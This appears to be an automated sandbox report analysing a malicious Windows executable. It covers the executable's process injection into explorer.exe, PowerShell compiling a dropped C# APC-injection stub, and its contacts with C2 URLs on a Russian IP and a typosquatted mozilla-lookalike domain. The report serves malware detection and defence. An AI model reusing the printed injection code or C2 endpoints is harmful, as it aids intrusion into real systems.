              File and Directory Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow13
              System Information Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 722154 Sample: bf.exe Startdate: 13/10/2022 Architecture: WINDOWS Score: 100 40 trackingg-protectioon.cdn1.mozilla.net 2->40 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus / Scanner detection for submitted sample 2->50 52 8 other signatures 2->52 9 bf.exe 6 2->9         started        13 mshta.exe 19 2->13         started        signatures3 process4 dnsIp5 42 45.8.158.104, 49696, 80 ASBAXETNRU Russian Federation 9->42 44 trackingg-protectioon.cdn1.mozilla.net 9->44 54 Writes to foreign memory regions 9->54 56 Modifies the context of a thread in another process (thread injection) 9->56 58 Maps a DLL or memory area into another process 9->58 60 2 other signatures 9->60 15 control.exe 9->15         started        18 powershell.exe 1 26 13->18         started        signatures6 process7 file8 34 C:\Users\user\AppData\...\4rgoqrxw.cmdline, Unicode 18->34 dropped 62 Creates a thread in another existing process (thread injection) 18->62 21 csc.exe 3 18->21         started        24 csc.exe 3 18->24         started        26 conhost.exe 18->26         started        28 explorer.exe 18->28 injected signatures9 process10 file11 36 C:\Users\user\AppData\Local\...\4rgoqrxw.dll, PE32 21->36 dropped 30 cvtres.exe 1 21->30         started        38 C:\Users\user\AppData\Local\...\n2sgiaoa.dll, PE32 24->38 dropped 32 cvtres.exe 1 24->32         started        process12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              bf.exe76%VirustotalBrowse
              bf.exe30%MetadefenderBrowse
              bf.exe100%AviraTR/Crypt.XPACK.Gen7
              bf.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              0.0.bf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://constitution.org/usdeclar.txt0%URL Reputationsafe
              http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
              http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
              http://crl.microsofU0%Avira URL Cloudsafe
              http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG0%Avira URL Cloudsafe
              http://45.8.158.104/uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct0%Avira URL Cloudsafe
              http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              trackingg-protectioon.cdn1.mozilla.net
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://45.8.158.104/uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pcttrue
                • Avira URL Cloud: safe
                		unknown
                http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pcttrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.699574757.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723471805.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.667027858.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://https://file://USER.ID%lu.exe/updbf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://constitution.org/usdeclar.txtbf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://trackingg-protectioon.cdn1.mozilla.net/uploaded/OpQxWz98QKMWv_2/FDwCe9CiLqhz94zXhO/jzUmpRbDp/explorer.exe, 0000000B.00000000.717723054.000000000F014000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGbf.exe, 00000000.00000003.612015496.00000000006D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://constitution.org/usdeclar.txtC:bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.microsofUpowershell.exe, 00000005.00000003.638688227.000001C32A171000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    45.8.158.104
                    		unknownRussian Federation
                    		49392ASBAXETNRUtrue

                    General Information

                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:722154
                    Start date and time:2022-10-13 09:27:32 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 8m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:bf.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winEXE@15/16@2/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 24
                    • Number of non-executed functions: 41
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): WMIADAP.exe, WmiPrvSE.exe
                    • Execution Graph export aborted for target mshta.exe, PID 5064 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:31:04API Interceptor39x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    45.8.158.104EJ6FBXJ9Dg.exeGet hashmaliciousBrowse
                      sadf.exeGet hashmaliciousBrowse
                        72.exeGet hashmaliciousBrowse
                          c0.exeGet hashmaliciousBrowse
                            64.exeGet hashmaliciousBrowse
                              gozi.exeGet hashmaliciousBrowse
                                b6.exeGet hashmaliciousBrowse
                                  9a.exeGet hashmaliciousBrowse
                                    336.exeGet hashmaliciousBrowse

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      ASBAXETNRUEJ6FBXJ9Dg.exeGet hashmaliciousBrowse
                                      • 45.8.158.104
                                      i#U00f3n.vbsGet hashmaliciousBrowse
                                      • 91.213.50.74
                                      file.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      file.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      ARMt22jv2D.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      file.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      dz0wzKoLP4.exeGet hashmaliciousBrowse
                                      • 91.213.50.71
                                      file.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      file.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      file.exeGet hashmaliciousBrowse
                                      • 194.5.78.209
                                      i#U00f3n.vbsGet hashmaliciousBrowse
                                      • 91.213.50.74
                                      1TotalNewInvoices_Th.xlsGet hashmaliciousBrowse
                                      • 91.213.50.43
                                      SecuriteInfo.com.Win64.CrypterX-gen.21705.5431.exeGet hashmaliciousBrowse
                                      • 194.50.171.236
                                      8_202210279797906347.xlsGet hashmaliciousBrowse
                                      • 91.213.50.43
                                      xgOjvJD3Oo.xlsGet hashmaliciousBrowse
                                      • 91.213.50.43
                                      xgOjvJD3Oo.xlsGet hashmaliciousBrowse
                                      • 91.213.50.43
                                      sadf.exeGet hashmaliciousBrowse
                                      • 45.8.158.104
                                      4_202210250456866742.xlsGet hashmaliciousBrowse
                                      • 91.213.50.43
                                      4_202210250456866742.xlsGet hashmaliciousBrowse
                                      • 91.213.50.43
                                      DB348DC69788F96C6CCDAEDB34B150FA21AC9D275A523.exeGet hashmaliciousBrowse
                                      • 91.229.90.152

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):11606
                                      Entropy (8bit):4.883977562702998
                                      Encrypted:false
                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                      Malicious:false
                                      Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1196
                                      Entropy (8bit):5.333915035046385
                                      Encrypted:false
                                      SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG
                                      MD5:B15D7C50C640BEF4A1E823CE568A5E5E
                                      SHA1:E456E2EE754F8FBA38F8F75858491258896C9E41
                                      SHA-256:A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0
                                      SHA-512:B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107
                                      Malicious:false
                                      Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                      C:\Users\user\AppData\Local\Temp\4rgoqrxw.0.cs

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                      Category:dropped
                                      Size (bytes):418
                                      Entropy (8bit):5.060887643546001
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuYl85FNVMRSR7a1X+o6RwuSRa+rVSSRnA/fMMLjUgL/Qy:V/DTLDfufVM62l9rV5nA/kePIy
                                      MD5:19FD6F555AD7C58D574C00F46F087B02
                                      SHA1:025EC4778721F20FDBFF775EDD2351BAEA93846C
                                      SHA-256:9D08DF39AD05BD4A53F416AB8EF6A2FCA313EB9A1498E451284B445BB1830DAC
                                      SHA-512:188488549588E593523DDAB3A8372D47E016841C3CE1594A456C0AC7C73763A3AE1E8A5FFFDC7B6455BD869D0F6BDEBD6B6BCB2AA6A6B4CF658231CE72DC40B9
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace gwrevlnvsd.{. public class pbhvkocniqy. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fyocqdmmlp,IntPtr sqi,IntPtr fbhcpwxb);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint imqvfxfe,uint jdfds,IntPtr ptybrwff);.. }..}.

                                      C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                      Category:dropped
                                      Size (bytes):353
                                      Entropy (8bit):5.245731191650942
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fFJ0zxs7+AEszI923fHyWHn:p37Lvkmb6KztJ0WZE2qAn
                                      MD5:4B8045D39F538756B8B62138A26F11E9
                                      SHA1:95874A0DCB5655188CFD8602A1A4DCD01B521B96
                                      SHA-256:B3C78ADC05D493C0E52386D05C77480C94B732423C3B7349DF6DA13F9C5E2F41
                                      SHA-512:8C66F125151F75F4DDC2FB9062D001DCC25942DE34AB42C389D0D17E36AE2C3AABB6C5FDA9157D9BC966691A5A868B9387FA2F998EA301303B87C55EDF1B7C32
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4rgoqrxw.0.cs"

                                      C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.6453992775319892
                                      Encrypted:false
                                      SSDEEP:24:etGSG8mmUgtJ85HIf/EEOnV4qmShytkZf4FexdVWpEWI+ycuZhN0xmGakSfxmXPE:6wXgt65oinB1J4FcdVyn1ulWa3iq
                                      MD5:5C4B891208032DBA1A02263355E4E9DE
                                      SHA1:1BD3E625D095A101173CAF1D794FE92AD02D0C4E
                                      SHA-256:004F167A5796CA987BCC5D4FAC040D72A10D39450F74A13147E72C0DCEC80AA4
                                      SHA-512:224AEE577A4B6F6F804C82B26512FC201C78D213EAB1F983306F12AD456B57C77849E5D91DC22B54820B080220EA2A64753896960B98C349DBBA59AF6942E940
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N=Hc...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..h.............................................................(....*BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................>.7...............,.......................#.............. E............ R............ e.....P ......p.........v.................................p. ...p...!.p.%...p.......*.....3.?.....E.......R.......e...........

                                      C:\Users\user\AppData\Local\Temp\4rgoqrxw.out

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):850
                                      Entropy (8bit):5.317499521256793
                                      Encrypted:false
                                      SSDEEP:24:AId3ka6KztJVE21uKaM5DqBVKVrdFAMBJTH:Akka6aDVE2QKxDcVKdBJj
                                      MD5:967799D658DF042EC73377D634879017
                                      SHA1:65B430F7577DF05F38080FFC1165C97BD6EDC1F2
                                      SHA-256:26533FAEFCD5B67D4B81CC17D362A2A238120A044B92C4CB55E662CFE4C2C085
                                      SHA-512:B4A0A2B0D8DC98F78E68476EC113B1872A2F51C9D4AC9A3AD84DA2697501C3CC2349B1772B4DCD650E91CE9F76A46B0678603A204ABBB2DF2F21E7960FEBD16A
                                      Malicious:false
                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4rgoqrxw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                      C:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.071104180333077
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0ak7YnqqKPN5Dlq5J:+RI+ycuZhNiakSKPNnqX
                                      MD5:77F267516B1EB24FF441C7AEFFE7CEEA
                                      SHA1:919FD845A3D90A83436CD074A4859048C5B8B64F
                                      SHA-256:054F1B995460C13C56857907432CB6A8F7C02F68BF403D75DF681011D52B8640
                                      SHA-512:4B787F2F398D6E56E820D37D83E4586E9D927A4C8B2EAD2C91BF9057D392CFDFFCAAA79E5B663DE4DD7DF8366D95766A9A956E18B479DE10241A80986E92119F
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.2.s.g.i.a.o.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.2.s.g.i.a.o.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.0985185644301043
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2lxmGak7YnqqFlxmXPN5Dlq5J:+RI+ycuZhN0xmGakSfxmXPNnqX
                                      MD5:E73626B90519176EF74EEFA1FBBF8359
                                      SHA1:B83852A543258A18918D5FCAC5B70AB5BA0D2B93
                                      SHA-256:3CBC786D97DE3D7A7F7F9E537EB4143D0085294DF5A1A5F80059D4644397BC45
                                      SHA-512:02D0C8C4FF7ABE946BA74DA1C0FF87063DC27EB25F062D8E59A9AF5CD7CE6FA98C5936DBA4EE1888702A70287D94B95F8BE624852F331455E8920819F61D0E00
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.r.g.o.q.r.x.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.r.g.o.q.r.x.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\RESE2A5.tmp

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Thu Oct 13 16:31:10 2022, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1320
                                      Entropy (8bit):3.9871089313851615
                                      Encrypted:false
                                      SSDEEP:24:HMnW9BiyQr68uHghKdNII+ycuZhN0xmGakSfxmXPNnq9hgd:KsiXuiKdu1ulWa3iq9y
                                      MD5:34E8D570049C9D06F2FF7C67BB1CE119
                                      SHA1:CFC0D654192DD0A7F2B6791AD807B30040F62283
                                      SHA-256:1F149258DAFCB5E28457E7290144535E4A82EE26B50707128325DB8ABEDEC660
                                      SHA-512:FDE97C0EB9559A196EF12B4C91CA2C0981A9F75991430C6759E24BBD03709A806D270BE6458B6A13CAA04D674FC23D93F3CE34E0185243CDCA58F158CD1ABB0B
                                      Malicious:false
                                      Preview:L...N=Hc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........L....c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP................6&....n.N....Y..........5.......C:\Users\user\AppData\Local\Temp\RESE2A5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.r.g.o.q.r.x.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

                                      C:\Users\user\AppData\Local\Temp\RESEB8E.tmp

                                      Download File
